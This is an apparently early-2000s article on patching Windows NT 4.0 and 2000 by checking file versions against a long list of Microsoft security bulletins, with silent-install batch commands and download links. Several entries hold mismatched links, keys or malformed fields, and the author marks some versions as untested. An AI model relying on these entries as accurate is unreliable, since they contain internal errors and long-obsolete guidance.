This paper is Mulit-Part, this means I am going to cover in this article
the HOTFIXES section, next article will cover the NT + 2000 Registry (Wait
for it :). I am going to cover NT hotfixes and if I still have space in
this article I will cover 2000 Hotfixes.
In my descriptions I am going to be breif but effective, no BLAH
BLAH...etc...
>------------------------------<
>---Who Should Read This ? ---<
>------------------------------<
Any home use who like to patch his / her box
Any business user who like to cut time when fixing his / her NT 2000 box
Any NT sysadmin who like learn a bit more
>------------------------------<
>---What does it Cover ? ---<
>------------------------------<
This version cover NT Hotfixes by file version. What do I mean by file
version? Here is the catch, more commercial tools that check for
HOTFIXES, they do it based by query the REGISTRY. I will explain more,
when you install NT hotfixes registry key is created and some files or
registry keys are updated all depend on the hotfix.
Checking the registry KEY is not the perfect way to make sure your
have the latest file version. As we all know when you install
application files get replaced and changed and so on... for this
reason I decided to check for HOTFIXES using file version. Sure this
method is a pain in the a$$ but at least once done I will be sure all my
files are OK.
OH !!! Before we start do not get SCARED by the HOTFIXES number.
>------------------------------------------<
>---After you install NT or 2K Do this ?---<
>------------------------------------------<
---> Install SP (Service Pack) First thing you should do after you
configure your NT or 2K to connect to the internet is to start fixing it
:)
===============
NT Server & Wks
===============
When you install NT default you do not have a browser capable to connect
to MS site and get the hotfixes I suggest you installin the latest (IE
5.5 ) So to install IE 5.5 you cannot just go from the default NT install
to MS site and get the latest IE, because your default IE is 3 and MS
site needs framing support and other gadgets. SO to solve this open your
browser IE 3 default or whatever.
---> Connect to Microsoft site and get the Service pack Sp6a
from this location:
http://download.microsoft.com/download/ie55sp1/Install/5.5_SP1/WIN98Me/EN
-US/ie5setup.exe get that file and then you are all SET -:).
After you install IE 5.5 SP1 install SP6a for NT and SP2 for 2000,
install the 120 Bits version if you are allowed.
---> Connect to Microsoft site and get the Service pack Sp6a
from this location:
http://support.microsoft.com/Support/NTServer/Content/ServicePacks/Default.asp
If you need to read more about the service pack installation point your
browser to: http://www.microsoft.com/ntserver/nts/downloads/recommended/SP6/
---> Install SP6a 128 bits and Reboot
==================
2K Advanced Server
==================
---> Connect to Microsoft site and get the Service pack SP2 from
this location:
http://www.microsoft.com/windows2000/downloads/servicepacks/sp2/sp2lang.asp
---> Install SP2 and Reboot
>------------------------------------<
>---NT HotFixes By File Version ? ---<
>------------------------------------<
===============
NT Server & Wks
===============
You need to download the hot fixes and install them. Here is a list of
available Hot fixes. After getting what you need put them in one
directory and create a batch file to install them all whitout rebooting
everytime.
HINT: To install a HotFix without rebooting and creating a UN-install
directory use these switch after the HOTFIX.exe -q -z -n. Some HotFixes
need /Q . To know what you need exactly type the hotfix number followed
by /? "QXXXXXX.exe /?"
Example of a batch file that install the HOTFIXES for your without
rebooting:
---[SNIP]---
echo ------[ This is an example of batch file that install NT Hotfixes]------
echo ------[ MS00-003:Q247869 Spoofed LPC Port Request]------
Q247869i.EXE -n -q -z
echo ------[ MS00-004:Q249108 RDISK Registry Enumeration File]------
Q249108i.EXE -n -q -z
---[SNIP]---
Here is the list of needed HOTFIXES for NT without IIS 4, this will
include file name and file version and a brief description
Saturday, July 07, 2001 6:53:50PM
NT4 MS00-003
Description=Q247869 MS00-003 Spoofed LPC Port Request
Info=http://www.microsoft.com/technet/security/bulletin/fq00-003.asp
Q247869i.EXE -n -q -z
File=%SystemRoot%\system32\NTOSKRNL.EXE
Version=4.0.1381.7086
NT4 MS00-004
Description=MS00-004: RDISK Registry Enumeration File
Info=http://www.microsoft.com/technet/security/bulletin/ms00-004.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17745
Q249108i.EXE -n -q -z
File=%SystemRoot%\system32\rdisk.exe
Version=4.0.1381.7033
NT4 MS00-005 A
Description=MS00-005: Malformed RTF Control Word
Info=http://www.microsoft.com/technet/security/bulletin/ms00-005.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17510
Q249973i.EXE -n -q -z
File=%SystemRoot%\system32\riched20.dll
Version=5.0.122.2
NT4 MS00-005 B
Description=MS00-005: Malformed RTF Control Word
Info=http://www.microsoft.com/technet/security/bulletin/ms00-005.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17510
Q249973i.EXE -n -q -z
File=%SystemRoot%\system32\riched32.dll
Version=4.0.835.1381
NT4 MS00-006 A
Description=MS00-006 Malformed Hit-Highlighting Argument
Patch=http://www.microsoft.com/TechNet/security/bulletin/ms00-006.asp
q252463i.exe -n -q -z
File=%SystemRoot%\system32\idq.dll
Version=5.0.1781.3
NT4 MS00-006 B
Description=Q252463-MS00-006 Malformed Hit-Highlighting Argument
Patch=http://www.microsoft.com/TechNet/security/bulletin/ms00-006.asp
q252463i.exe -n -q -z
File=%SystemRoot%\system32\query.dll
Version=5.0.1781.3
NT4 MS00-006 C
Description=Q252463-MS00-006 Malformed Hit-Highlighting Argument
Patch=http://www.microsoft.com/TechNet/security/bulletin/ms00-006.asp
q252463i.exe -n -q -z
File=%SystemRoot%\system32\webhits.dll
Version=5.0.1781.3
NT4 MS00-007
Description=MS00-007: Recycle Bin Creation
Info=http://www.microsoft.com/technet/security/bulletin/ms00-007.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=22155
Q248399i.EXE -n -q -z
File=%SystemRoot%\system32\shell32.dll
Version=4.0.1381.7037
NT4 MS00-008 A
Description=MS00-008: Registry Permissions
Key=HKLM\System\CurrentControlSet\Control\SecurePipeServers\winreg
Perm=Administrators:(Full)*1,Backup Operators:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330
NT4 MS00-008 B
Description=MS00-008: Registry Permissions
HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg\AllowedPaths
Perm=Administrators:(Full)*1,Backup Operators:(Read)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330
Value Type: REG MULTI_SZ - Multi string
Default Data:
System\\CurrentControlSet\\Control\\ProductOptions
System\\CurrentControlSet\\Control\\Print\\Printers
System\\CurrentControlSet\\Services\\Eventlog
Software\\Microsoft\\Windows NT\\CurrentVersion
System\\CurrentControlSet\\Services\\Replicator
NT4 MS00-008 C
Description=MS00-008: Registry Permissions
Key=HKLM\System\CurrentControlSet\Services\w3svc\parameters\ADCLaunch
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated
Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330
NT4 MS00-008 D
Description=MS00-008: Registry Permissions
Key=HKLM\System\CurrentControlSet\Services\w3svc\parameters\ADCLaunch\AdvancedDa
taFactory
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated
Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330
NT4 MS00-008 E
Description=MS00-008: Registry Permissions
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated
Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330
Key=HKLM\System\CurrentControlSet\Services\w3svc\parameters\ADCLaunch\RDSServer.
DataFactory
NT4 MS00-008 F
Description=MS00-008: Registry Permissions
Key=HKLM\Software\Microsoft\DataFactory
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated
Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330
NT4 MS00-008 G
Description=MS00-008: Registry Permissions
Key=HKLM\Software\Microsoft\DataFactory\HandlerInfo
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated
Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330
NT4 MS00-008 H
Description=MS00-008: Registry Permissions
Key=HKLM\Software\Microsoft\DataFactory\HandlerInfo\safeHandlerList
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated
Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330
NT4 MS00-008 I
Description=MS00-008: Registry Permissions
Key=HKLM\Software\Microsoft\DataFactory\HandlerInfo\safeHandlerList\MSDFMAP.Hand
ler
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated
Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330
NT4 MS00-008 J
Description=MS00-008: Registry Permissions
Key=HKLM\Software\Microsoft\DataFactory\HandlerInfo\safeHandlerList\MSDFMAP_VB.H
andler
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated
Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330
NT4 MS00-008 K
Description=MS00-008: Registry Permissions
Key=HKLM\Software\Microsoft\DataFactory\HandlerInfo\safeHandlerList\MSDFMAP_VC.H
andler
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated
Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330
NT4 MS00-008 L
Description=MS00-008: Registry Permissions
Key=HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell
Folders
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated
Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330
NT4 MS00-008 M
Description=MS00-008: Registry Permissions
Key=HKLM\Software\Microsoft\Windows NT\CurrentVersion\AeDebug
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated
Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330
NT4 MS00-021
Description=MS00-021: Malformed TCP/IP Print Request
Info=http://www.microsoft.com/technet/security/bulletin/ms00-021.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20015
Q257870i.EXE -n -q -z
Key=HKLM\Software\Microsoft\Windows NT\CurrentVersion\Hotfix\Q257870
Name=Installed
Value=1
Warn=More test to be done to find the correct version and location of the
file
lpdsvc.dll. This file is installed when you install normaly the
hotfix
Q257870i.EXE
NT4 MS00-024
Description=MS00-024: OffloadModExpo Registry Permissions
Info=http://www.microsoft.com/technet/security/bulletin/ms00-024.asp
Patch=http://download.microsoft.com/download/winntsp/Patch/Q259496/NT4/EN-US/Q25
9496i.exe
File=%SystemRoot%\system32\regacl40.exe
Version=4.0.1381.7064
NT4 MS00-027
Description=MS00-027: Malformed Environment Variable
Info=http://www.microsoft.com/technet/security/bulletin/ms00-027.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20494
Q259622i.EXE -n -q -z
File=%SystemRoot%\system32\CMD.EXE
Version=4.0.1381.7048
NT4 MS00-029
Description=MS00-029: IP Fragment Reassembly
Info=http://www.microsoft.com/technet/security/bulletin/ms00-029.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20829
Q259728i.EXE -n -q -z
File=%SystemRoot%\system32\drivers\tcpip.sys
Version=4.0.1381.7050
NT4 MS00-036
Description=MS00-036: ResetBrowser Frame
Info=http://www.microsoft.com/technet/security/bulletin/ms00-036.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=21397
Q262694i.EXE -n -q -z
File=%SystemRoot%\system32\drivers\rdr.sys
Version=4.0.1381.7055
NT4 MS00-040 A
Description=MS00-040: Remote Registry Access Authentication
Info=http://www.microsoft.com/technet/security/bulletin/ms00-040.asp
Patch=http://download.microsoft.com/download/winntsp/Patch/Q264684/NT4/EN-US/Q26
4684i.EXE
Q264684i.EXE -n -q -z
File=%SystemRoot%\system32\rpcrt4.dll
Version=4.0.1381.7058
NT4 MS00-040 B
Description=MS00-040: Remote Registry Access Authentication
Info=http://www.microsoft.com/technet/security/bulletin/ms00-040.asp
Patch=http://download.microsoft.com/download/winntsp/Patch/Q264684/NT4/EN-US/Q26
4684i.EXE
Q264684i.EXE -n -q -z
File=%SystemRoot%\system32\WINLOGON.EXE
Version=4.0.1381.7058
NT4 MS00-047
Description=MS00-047: NetBIOS Name Server Protocol Spoofing
Info=http://www.microsoft.com/technet/security/bulletin/MS00-047.asp
Patch=http://www.microsoft.com/ntserver/nts/downloads/critical/q269239/download.
asp
File=%SystemRoot%\system32\drivers\netbt.sys
Version=4.0.1381.7086
NT4 MS00-052 A
Description=MS00-052: Relative Shell Path
Info=http://www.microsoft.com/technet/security/bulletin/MS00-052.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23360
q269049i.exe -n -q -z
File=%SystemRoot%\system32\MSGINA.DLL
Version=4.0.1381.7085
NT4 MS00-052 B
Description=MS00-052: Relative Shell Path
Info=http://www.microsoft.com/technet/security/bulletin/MS00-052.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23360
q269049i.exe -n -q -z
File=%SystemRoot%\system32\USERINIT.EXE
Version=4.0.1381.7085
NT4 MS00-070 A
Description=MS00-070: Multiple LPC and LPC Ports
Info=http://www.microsoft.com/technet/security/bulletin/MS00-070.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24650
q266433i.exe -n -q -z
File=%SystemRoot%\system32\NTOSKRNL.EXE
Version=4.0.1381.7086
NT4 MS00-070 B
Description=MS00-070: Multiple LPC and LPC Ports
Info=http://www.microsoft.com/technet/security/bulletin/MS00-070.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24650
q266433i.exe -n -q -z
File=%SystemRoot%\system32\MSAUDITE.DLL
Version=4.0.1381.7086
NT4 MS00-070 C
Description=MS00-070: Multiple LPC and LPC Ports
Info=http://www.microsoft.com/technet/security/bulletin/MS00-070.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24650
q266433i.exe -n -q -z
File=%SystemRoot%\system32\SMSS.EXE
Version=4.0.1381.7086
NT4 MS00-077
Description=MS00-077: NetMeeting Desktop Sharing
Info=http://www.microsoft.com/technet/security/bulletin/MS00-077.asp
Patch=http://download.microsoft.com/download/netmeeting/SP/3.01/W9XNT4/EN-US/NM3
0.EXE
Key=HKLM\Software\Microsoft\Windows NT\CurrentVersion\Hotfix\Q266433
Name=Installed
Value=1
NT4 MS00-081
Description=MS00-081 VM File Reading
Info=http://www.microsoft.com/TechNet/security/bulletin/MS00-081.asp
Patch=Patch=http://download.microsoft.com/download/vm/Install/3802/W9X2KMe/EN-US
/msjavx86.exe
JAVA All builds in the 3000 series numbered 3318 or earlier.
File=%SystemRoot%\jview.exe
Version=5.0.3802.0
NT4 MS00-083
Description=MS00-083: Netmon Protocol Parsing
Info=http://www.microsoft.com/technet/security/bulletin/MS00-083.asp
Patch=http://download.microsoft.com/download/win2000platform/Patch/Q274835/NT5/E
N-US/Q274835_W2K_SP2_x86 En.EXE
q274835i.exe -n -q -z
Key=HKLM\Software\Microsoft\Windows NT\CurrentVersion\Hotfix\Q274835
Name=Installed
Value=1
NT4 MS00-090 A
Description=Q238934 Q280419 MS00-090 .ASX Buffer Overrun and .WMS Script
Info=http://www.microsoft.com/technet/security/bulletin/fq00-090.asp
wmsu33995.exe /Q
File=%SystemRoot%\system32\dxmasf.dll
Version=6.4.9.1109
NT4 MS00-090 B
Description=MS00-090 .ASX Buffer Overrun and .WMS Script
Info=http://www.microsoft.com/technet/security/bulletin/fq00-090.asp
wmsu33995.exe /Q
File=%SystemRoot%\system32\advpack.dll
Version=5.50.4522.1800
NT4 MS00-091
Description=MS00-091: Incomplete TCP/IP Packet
Info=http://www.microsoft.com/technet/security/bulletin/ms00-091.asp
Patch=http://www.microsoft.com/ntserver/nts/downloads/critical/q275567/download.
asp
File=%SystemRoot%\system32\drivers\netbt.sys
Version=4.0.1381.7086
NT4 MS00-094
Description=MS00-094: Phone Book Service Buffer Overflow
Info=http://www.microsoft.com/technet/security/bulletin/ms00-094.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26193
Q276575i.EXE -n -q -z The fix will patch pbserver.dll. The file version
must
be
checked and replaced in this rule
File=%SystemRoot%\system32\pbserver.dll
Version=7.1.2195.2478
NT4 MS00-095 A
Description=MS00-095: Registry Permissions
Info=http://www.microsoft.com/technet/security/bulletin/MS00-095.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24501
Q265714i.EXE -n -q -z
File=%SystemRoot%\system32\TCPCFG.DLL
Version=4.0.1381.7064
NT4 MS00-095 B
Description=MS00-095: Registry Permissions
Info=http://www.microsoft.com/technet/security/bulletin/MS00-095.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24501
Q265714i.EXE -n -q -z
File=%SystemRoot%\system32\regacl40.exe
Version=4.0.1381.7064
NT4 MS01-003 A
Description=MS01-003 Winsock Mutex
Info=http://www.microsoft.com/technet/security/bulletin/fq01-003.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27272
Patch=http://www.microsoft.com/ntserver/nts/downloads/critical/q279336/download.
asp
For terminal Server
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27291
File=%SystemRoot%\system32\mswsock.dll
Version=4.0.1381.7086
NT4 MS01-003 B
Description=Q279336 MS01-003 Winsock Mutex
Info=http://www.microsoft.com/technet/security/bulletin/fq01-003.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27272
Patch=http://www.microsoft.com/ntserver/nts/downloads/critical/q279336/download.
asp
For terminal Server
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27291
File=%SystemRoot%\system32\ws2_32.dll
Version=4.0.1381.7086
NT4 MS01-008
Description=MS01-008 NTLMSSP Privilege Elevation
Info=http://www.microsoft.com/technet/security/bulletin/fq01-008.asp
q280119i.exe -n -q -z
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27804
For terminal Server
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27824
File=%SystemRoot%\system32\NTLMSSPS.DLL
Version=4.0.1381.7086
NT4 MS01-009
Description=MS01-009 Malformed PPTP Packet Stream
Info=http://www.microsoft.com/TechNet/security/bulletin/MS01-009.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27836
q283001i.exe -n -q -z
File=%SystemRoot%\system32\drivers\raspptpe.sys
Version=4.0.1381.7090
NT4 MS01-033
Description=MS01-033 Unchecked Buffer in Index Server ISAPI Extension
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833
File=%SystemRoot%\system32\idq.dll
Version=5.0.1781.3
NT4 MS01-035 A
Description=FrontPage Server Extension Unchecked Buffer
Info=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038
Patch=http://download.microsoft.com/download/winntsp/Patch/Q300477/NT4/EN-US/Q30
0477.exe
File=%SYSTEMDRIVE%\Program Files\Common Files\Microsoft Shared\web server
extensions\40\servsupp\fp4Amsft.dll
Version=4.0.2.5121
NT4 MS01-035 B
Description=FrontPage Server Extension Unchecked Buffer
Info=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038
Patch=http://download.microsoft.com/download/winntsp/Patch/Q300477/NT4/EN-US/Q30
0477.exe
File=%SYSTEMDRIVE%\Program Files\Common Files\Microsoft Shared\web server
extensions\40\bin\fp4Awel.dll
Version=4.0.2.5121
NT4 MS01-035 C
Description=FrontPage Server Extension Unchecked Buffer
Info=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038
Patch=http://download.microsoft.com/download/winntsp/Patch/Q300477/NT4/EN-US/Q30
0477.exe
File=%SYSTEMDRIVE%\Program Files\Common Files\Microsoft Shared\web server
extensions\40\bin\fp4Areg.dll
Version=4.0.2.5121
NT4 MS99-025
Description=MS99-025 Unauthorized Access using ODBC
File=%SystemDrive%\Program Files\Common Files\System\OLE DB\oledb32.dll
Info=http://www.microsoft.com/TechNet/security/bulletin/ms99-025.asp
Version=2.51.5303.0
NT4 MS99-041
Description=MS99-041: RASMAN Security Descriptor
Info=http://www.microsoft.com/technet/security/bulletin/ms99-041.asp
Patch=ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/Hotfixes-
PostSP6/Security/Rasman-fix/
Perm=Administrators:(Full),Authenticated Users:(CQEAIUR),System:(Full)
Type of check: Check permissions on a service RasMan
NT4 MS99-046 A
Description=MS99-046: TCP Initial Sequence Number Randomness
Info=http://www.microsoft.com/technet/security/bulletin/ms99-046.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16764
q243835i.exe -n -q -z
File=%SystemRoot%\system32\drivers\tcpip.sys
Version=4.0.1381.7050
NT4 MS99-046 B
Description=MS99-046: TCP Initial Sequence Number Randomness
Info=http://www.microsoft.com/technet/security/bulletin/ms99-046.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16764
File=%SystemRoot%\system32\wshtcpip.dll
Version=4.0.1381.336
NT4 MS99-047 A
Description=MS99-047: Malformed Spooler Request
Info=http://www.microsoft.com/technet/security/bulletin/ms99-047.asp
Patch=http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/NT4/EN
-US/Q243649.exe
File=%SystemRoot%\system32\spoolss.exe
Version=4.0.1381.7022
NT4 MS99-047 B
Description=MS99-047: Malformed Spooler Request
Info=http://www.microsoft.com/technet/security/bulletin/ms99-047.asp
http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/NT4/EN-US/Q2
43649.exe
Patch=File=%SystemRoot%\system32\spoolss.dll
Version=4.0.1381.7022
NT4 MS99-047 C
Description=MS99-047: Malformed Spooler Request
Info=http://www.microsoft.com/technet/security/bulletin/ms99-047.asp
Patch=http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/NT4/EN
-US/Q243649.exe
File=%SystemRoot%\system32\localmon.dll
Version=4.0.1381.7022
NT4 MS99-047 D
Description=MS99-047: Malformed Spooler Request
Info=http://www.microsoft.com/technet/security/bulletin/ms99-047.asp
Patch=http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/NT4/EN
-US/Q243649.exe
File=%SystemRoot%\system32\win32spl.dll
Version=4.0.1381.7022
NT4 MS99-055
Description=MS99-055: Malformed Resource Enumeration Argument
Info=http://www.microsoft.com/technet/security/bulletin/ms99-055.asp
Patch=http://download.microsoft.com/download/winntsrv40/Update/srvsvc/NT4/EN-US/
Q246045.EXE
q246045.exe -n -q -z
File=%SystemRoot%\system32\srvsvc.dll
Version=4.0.1381.7029
NT4 MS99-056 A
Description=MS99-056: Syskey Keystream Reuse
Info=http://www.microsoft.com/technet/security/bulletin/ms99-056.asp
Patch=http://download.microsoft.com/download/winntsp/Patch/syskey/NT4/EN-US/Q248
183.EXE
File=%SystemRoot%\system32\lsasrv.dll
Version=4.0.1381.7029
NT4 MS99-056 B
Description=MS99-056: Syskey Keystream Reuse
Info=http://www.microsoft.com/technet/security/bulletin/ms99-056.asp
Patch=http://download.microsoft.com/download/winntsp/Patch/syskey/NT4/EN-US/Q248
183.EXE
File=%SystemRoot%\system32\samsrv.dll
Version=4.0.1381.7030
NT4 MS99-057
Description=MS99-057: Malformed Security Identifier Request same as
MS99-056
Rule=W2K MS01-037 D
Inherit all the settings of this rule MS99-057
NT4 MS-Q249863
Description=Q249863 SGC Connections May Fail from Domestic Clients
Info=http://support.microsoft.com/support/kb/articles/Q249/8/63.ASP
Info=http://www.microsoft.com/Windows95/downloads/contents/WUCritical/schannel/D
efault.asp
Patch=http://www.microsoft.com/NTWorkstation/downloads/Critical/schannel/default
.asp q249863i.exe -n -q -z
File=%SystemRoot%\system32\schannel.dll
Version=4.87.1961.1877
NT4 W2K MS00-094
Description=MS00-094: Phone Book Service Buffer Overflow
Info=http://www.microsoft.com/technet/security/bulletin/ms00-094.asp
Patch=http://download.microsoft.com/download/win2000platform/Patch/Q276575/NT5/E
N-US/Q276575_W2K_SP2_x86_en.EXE
File=%SystemRoot%\system32\pbserver.dll
Version=7.1.2195.2478
NT4 W2K MS01-022
Description=MS01-022 OLE DB Provider for Internet Publishing
Info=http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security
/bulletin/ms01-004.asp
Patch=http://download.microsoft.com/download/win2000platform/Update/1.5/WIN98Me/
EN-US/rbupdate.exe
File=This will Update many files that is why are not listed.
================================================================================
Below are the needed HOTFIXES for NT server based on MS site.
================================================================================
December 2000
MS00-095: Tool Available for "Registry Permissions" Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS00-095.asp
MS00-094: Patch Available for "Phone Book Service Buffer Overflow"
Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS00-094.asp
November 2000
MS00-091: Patch Available for "Incomplete TCP/IP Packet" Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS00-091.asp
MS00-083: Patch Available for "Netmon Protocol Parsing" Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS00-083.asp
October 2000
MS00-070: Patch Available for "Multiple LPC and LPC Ports" Vulnerabilities
http://www.microsoft.com/technet/security/bulletin/MS00-070.asp
July 2000
MS00-052: Patch Available for "Relative Shell Path" Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS00-052.asp
MS00-047: Patch Available for "NetBIOS Name Server Protocol Spoofing"
Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS00-047.asp
June 2000
MS00-040: Patch Available for "Remote Registry Access Authentication "
Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms00-040.asp
May 2000
MS00-036: Patch Available for "ResetBrowser Frame" and "HostAnnouncement
Flooding" Vulnerabilities
http://www.microsoft.com/technet/security/bulletin/ms00-036.asp
MS00-029: Patch Available for "IP Fragment Reassembly" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms00-029.asp
April 2000
MS00-027: Patch Available for "Malformed Environment
Variable" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms00-027.asp
MS00-024: Tool Available for "OffloadModExpo Registry Permissions"
Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms00-024.asp
March 2000
MS00-021: Patch Available for "Malformed TCP/IP Print
Request" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms00-021.asp
MS00-008: Patch Available for "Registry Permissions" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
February 2000
MS00-007: Patch Available for "Recycle Bin Creation" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms00-007.asp
January 2000
MS00-005: Patch Available for "Malformed RTF Control Word" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms00-005.asp
MS00-004: Patch Available for "RDISK Registry Enumeration
File" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms00-004.asp
December 1999
MS99-057: Patch Available for "Malformed Security Identifier Request"
Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms99-057.asp
MS99-056: Patch Available for "Syskey Keystream Reuse" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms99-056.asp
MS99-055: Patch Available for "Malformed Resource Enumeration Argument"
Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms99-055.asp
November 1999
MS99-047: Patch Available for "Malformed Spooler Request" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms99-047.asp
October 1999
MS99-046: Patch Available to Improve TCP Initial Sequence Number
Randomness
http://www.microsoft.com/technet/security/bulletin/ms99-046.asp
September 1999
MS99-041: Patch Available for "RASMAN Security Descriptor" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms99-041.asp
MS99-038: Patch Available for "Spoofed Route Pointer" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms99-038.asp
MS99-036: Windows NT 4.0 Does Not Delete Unattended Installation File
http://www.microsoft.com/technet/security/bulletin/ms99-036.asp
MS99-034: Patch Available for "Fragmented IGMP Packet" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms99-034.asp
July 1999
MS99-026: Patch Available for "Malformed Dialer Entry" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms99-026.asp
MS99-024: Patch Available for "Unprotected IOCTLs" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms99-024.asp
June 1999
MS99-023: Patch Available for "Malformed Image Header" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms99-023.asp
MS99-021: Patch Available for "CSRSS Worker Thread
Exhaustion" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms99-021.asp
MS99-020: Patch Available for "Malformed LSA Request" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms99-020.asp
May 1999
MS99-017: Patch Available for "RAS and RRAS Password" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms99-017.asp
MS99-016: Patch Available for "Malformed Phonebook Entry" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms99-016.asp
MS99-015: Patch Available for "Malformed Help File" Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms99-015.asp
March 1999
MS99-008: Patch Available for Windows NT "Screen Saver" Vulnerability
